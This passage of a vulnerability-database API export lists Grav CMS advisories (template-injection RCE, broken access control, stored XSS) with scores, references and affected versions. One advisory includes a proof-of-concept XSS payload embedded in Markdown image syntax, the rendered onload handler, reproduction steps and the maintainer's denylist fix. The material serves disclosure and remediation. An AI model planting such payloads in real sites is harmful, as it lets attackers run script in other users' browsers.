            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9n7-vann-6fa5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49306?format=api",
            "vulnerability_id": "VCID-vm87-35gf-eyft",
            "summary": "Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass\nA Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the `cleanDangerousTwig` method.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66294",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.37646",
                            "scoring_system": "epss",
                            "scoring_elements": "0.97286",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66294"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66294",
                    "reference_id": "CVE-2025-66294",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66294"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-662m-56v4-3r8f",
                    "reference_id": "GHSA-662m-56v4-3r8f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-662m-56v4-3r8f"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f",
                    "reference_id": "GHSA-662m-56v4-3r8f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66294",
                "GHSA-662m-56v4-3r8f"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vm87-35gf-eyft"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92153?format=api",
            "vulnerability_id": "VCID-xj7v-ry9d-dfh1",
            "summary": "Grav CMS vulnerable to stored XSS via Markdown media attribute() action\n### Summary\n\nAn authenticated user with page editing permissions can inject an executable JavaScript event-handler attribute into rendered image HTML through Grav's Markdown media action syntax.\n\nThe issue is caused by Markdown image query parameters being converted into callable media actions. The public `attribute()` media method can be reached this way, allowing an editor to set an arbitrary HTML attribute name and value on the generated image element.\n\nFor example, this Markdown:\n\n```markdown\n![Quarterly market overview](market-overview.gif?attribute=onload,alert(document.domain))\n```\n\nis rendered as an image tag containing an executable `onload` handler:\n\n```html\n<img onload=\"alert(document.domain)\" alt=\"Quarterly market overview\" src=\"/user/pages/03.campaigns/market-overview.gif?...\">\n```\n\nThis results in stored XSS when another user views the affected page. In a multi-user Grav installation, a lower-privileged page editor could use this to target administrators or reviewers who preview or view editor-controlled content.\n\nTested versions:\n\n- Grav CMS: 1.7.49.5\n- Admin Plugin: 1.10.49.1\n\nSuggested classification:\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation\n- Stored Cross-Site Scripting\n- Suggested CVSS v4.0 score if page editing is considered high privilege: 6.9 Medium\n- Suggested CVSS v4.0 vector: `CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N`\n- Suggested CVSS v3.1 score if page editing is considered high privilege: 6.9 Medium\n- Suggested CVSS v3.1 vector: `CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N`\n\n### Details\n\nThe issue appears to come from this source-to-sink flow:\n\n1. `ParsedownGravTrait::inlineImage()` processes Markdown images.\n2. `Excerpts::processImageExcerpt()` resolves the referenced media object.\n3. 
`Excerpts::processMediaActions()` parses the image URL query string into media actions.\n4. `call_user_func_array()` invokes the requested action method on the media object.\n5. `MediaObjectTrait::attribute()` stores the attacker-controlled attribute name and value.\n6. The media object returns a Parsedown element containing the injected attribute.\n7. Parsedown renders the attribute name into the final HTML.\n\nRelevant code paths:\n\n```text\nsystem/src/Grav/Common/Markdown/ParsedownGravTrait.php\nsystem/src/Grav/Common/Page/Markdown/Excerpts.php\nsystem/src/Grav/Common/Media/Traits/MediaObjectTrait.php\nsystem/src/Grav/Common/Page/Medium/StaticImageMedium.php\nsystem/src/Grav/Common/Page/Medium/ImageMedium.php\nvendor/erusev/parsedown/Parsedown.php\n```\n\nIn `system/src/Grav/Common/Markdown/ParsedownGravTrait.php`, Markdown image excerpts are passed into Grav-specific media handling:\n\n```php\nif (isset($excerpt['element']['attributes']['src'])) {\n    $excerpt = $this->excerpts->processImageExcerpt($excerpt);\n}\n```\n\nIn `system/src/Grav/Common/Page/Markdown/Excerpts.php`, query string parameters are converted into media action calls. 
The query parameter name becomes the method name:\n\n```php\n$carry[] = ['method' => $parts[0], 'params' => $value];\n```\n\nThe requested method is later invoked dynamically:\n\n```php\n$medium = call_user_func_array([$medium, $action['method']], $args);\n```\n\nFor the payload:\n\n```text\nattribute=onload,alert(document.domain)\n```\n\nthe method is `attribute`, and the arguments are `onload` and `alert(document.domain)`.\n\nIn `system/src/Grav/Common/Media/Traits/MediaObjectTrait.php`, `attribute()` stores the caller-controlled attribute name directly:\n\n```php\npublic function attribute($attribute = null, $value = '')\n{\n    if (!empty($attribute)) {\n        $this->attributes[$attribute] = $value;\n    }\n    return $this;\n}\n```\n\nThe image media classes then return the collected attributes as attributes for an `img` element.\n\nIn `system/src/Grav/Common/Page/Medium/StaticImageMedium.php`:\n\n```php\nreturn ['name' => 'img', 'attributes' => $attributes];\n```\n\nThe non-static image path in `system/src/Grav/Common/Page/Medium/ImageMedium.php` also returns image attributes in the same way.\n\nFinally, in `vendor/erusev/parsedown/Parsedown.php`, the attribute value is escaped, but the attribute name is rendered as-is:\n\n```php\n$markup .= ' '.$name.'=\"'.self::escape($value).'\"';\n```\n\nAs a result, the attacker-controlled attribute name `onload` is emitted into the final HTML and executes as a browser event handler.\n\nThe Admin Plugin's save-time XSS detection does not appear to block this because the stored content is Markdown media syntax, not raw HTML:\n\n```markdown\n![Quarterly market overview](market-overview.gif?attribute=onload,alert(document.domain))\n```\n\nThe dangerous HTML is generated later during Markdown/media rendering.\n\n### PoC\n\nI reproduced this on a standard Grav CMS installation with the Admin Plugin enabled.\n\nConfiguration and prerequisites:\n\n- Grav CMS 1.7.49.5\n- Admin Plugin 1.10.49.1\n- Markdown processing enabled 
for pages\n- A user account with permission to create or edit pages\n- A page media file available in the edited page folder, for example `market-overview.gif`\n\nSteps to reproduce:\n\n1. Install Grav CMS with the Admin Plugin.\n2. Log in to the Admin panel as a user who can create or edit pages.\n3. Create a normal content page or edit an existing one.\n4. Add or reference a page media file named `market-overview.gif`.\n5. Insert the following Markdown into the page body:\n\n   ```markdown\n   ![Quarterly market overview](market-overview.gif?attribute=onload,alert(document.domain))\n   ```\n\n6. Save the page.\n7. Open the rendered frontend page in a browser.\n8. The JavaScript payload executes when the image loads.\n9. Inspect the generated DOM. The rendered image element contains the injected `onload` attribute.\n\nExpected result:\n\nThe Markdown media action should not be able to generate executable HTML attributes. The payload should be rejected, sanitized, or rendered without the dangerous event-handler attribute.\n\nActual result:\n\nThe payload is accepted and rendered as an executable image event handler:\n\n```html\n<img onload=\"alert(document.domain)\" alt=\"Quarterly market overview\" src=\"/user/pages/03.campaigns/market-overview.gif?...\">\n```\n\nScreenshots:\n\n- the stored Markdown payload in the page editor\n<img width=\"1718\" height=\"1013\" alt=\"edycja\" src=\"https://github.com/user-attachments/assets/8f5e5275-e4ef-4d5e-a2cd-44683537b909\" />\n- the JavaScript alert executing on the frontend page\n<img width=\"1727\" height=\"1002\" alt=\"alert\" src=\"https://github.com/user-attachments/assets/6de81228-830c-49f2-ac41-b15658a8913d\" />\n- browser DevTools showing the injected `onload` attribute in the rendered DOM\n<img width=\"939\" height=\"539\" alt=\"inspect\" src=\"https://github.com/user-attachments/assets/7832c42d-6f3a-4ea2-b072-b837bd3913ed\" />\n\n### Impact\n\nThis is a stored cross-site scripting vulnerability.\n\nAn 
authenticated user with page editing permissions can store a malicious Markdown image reference. When the affected page is rendered, the payload executes in the browser of any user who views that page.\n\nIn multi-user Grav installations, this may allow a lower-privileged editor to target administrators, reviewers, or other privileged users who preview or view editor-controlled content. Depending on the victim's privileges and deployed plugins, successful exploitation may allow JavaScript execution in the site origin, access to same-origin page data available to the victim, and same-origin actions performed as the victim.\n\nCVSS 4.0 rationale:\n\n- `AV:N`: the issue is exploitable through the web application.\n- `AC:L`: no special race condition or complex setup is required after page editing access is obtained.\n- `AT:P`: exploitation requires the malicious Markdown/media reference to be stored in page content and later rendered to a victim.\n- `PR:H`: the attacker needs page editing capability.\n- `UI:P`: a victim must view the affected page. 
The demonstrated `onload` payload executes on passive page rendering, without requiring a click or form submission by the victim.\n- `VC:H/VI:L/VA:N`: confidentiality impact can be high when the victim is an administrator or reviewer; integrity impact is limited; no direct availability impact was demonstrated.\n- `SC:H/SI:L/SA:N`: the injected script executes in the browser/application context and may affect subsequent same-origin interactions available to the victim.\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `MediaObjectTrait::attribute()` — the sink reached by Markdown like `![alt](img.gif?attribute=onload,alert(1))` — now gates the attribute **name** through an allowlist regex (`^[A-Za-z][A-Za-z0-9_:.\\-]*$`) plus an explicit denylist of script-context names:\n\n- any `on*` handler (case-insensitive)\n- `style` (inline CSS expression risk)\n- `xmlns` (XML namespace tricks)\n- `srcdoc` (iframe sandbox bypass)\n- `formaction` (form action override)\n\nInvalid names are silently dropped — the attribute isn't stored, so it doesn't survive into the rendered `<img>`. `src`/`href`/`data-*`/`aria-*`/standard media attributes are unaffected.\n\n**Files:**\n- [`system/src/Grav/Common/Media/Traits/MediaObjectTrait.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Media/Traits/MediaObjectTrait.php) — new `isSafeAttributeName()` gate.\n- [`tests/unit/Grav/Common/Security/MediaAttributeSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/MediaAttributeSecurityTest.php) — 28 cases (14 dangerous-name rejections, 14 safe-name round-trips).\n\n### Discoverers\n\n@K-Czaplicki\n@morzelowski\n\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42841",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00023",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06793",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42841"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T16:19:03Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-r7fx-8g49-7hhr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T16:19:03Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-r7fx-8g49-7hhr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42841",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42841"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r7fx-8g49-7hhr",
                    "reference_id": "GHSA-r7fx-8g49-7hhr",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-r7fx-8g49-7hhr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42841",
                "GHSA-r7fx-8g49-7hhr"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xj7v-ry9d-dfh1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49333?format=api",
            "vulnerability_id": "VCID-y7vc-cx37-7ubs",
            "summary": "Grav has Broken Access Control which allows an Editor to modify the page's YAML Frontmatter to alter form processing actions\nDue to a broken access control vulnerability in the `/admin/pages/{page_name}` endpoint, an editor (a user with full permissions to pages) can change the functionality of a form after submission.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66301",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.29124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.96677",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66301"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66301",
                    "reference_id": "CVE-2025-66301",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66301"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v8x2-fjv7-8hjh",
                    "reference_id": "GHSA-v8x2-fjv7-8hjh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v8x2-fjv7-8hjh"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh",
                    "reference_id": "GHSA-v8x2-fjv7-8hjh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T16:26:05Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66301",
                "GHSA-v8x2-fjv7-8hjh"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y7vc-cx37-7ubs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47311?format=api",
            "vulnerability_id": "VCID-yh73-zyju-vqge",
            "summary": "Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28116",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.62168",
                            "scoring_system": "epss",
                            "scoring_elements": "0.98379",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28116"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28116",
                    "reference_id": "CVE-2024-28116",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28116"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c9gp-64c4-2rrh",
                    "reference_id": "GHSA-c9gp-64c4-2rrh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c9gp-64c4-2rrh"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh",
                    "reference_id": "GHSA-c9gp-64c4-2rrh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.45",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
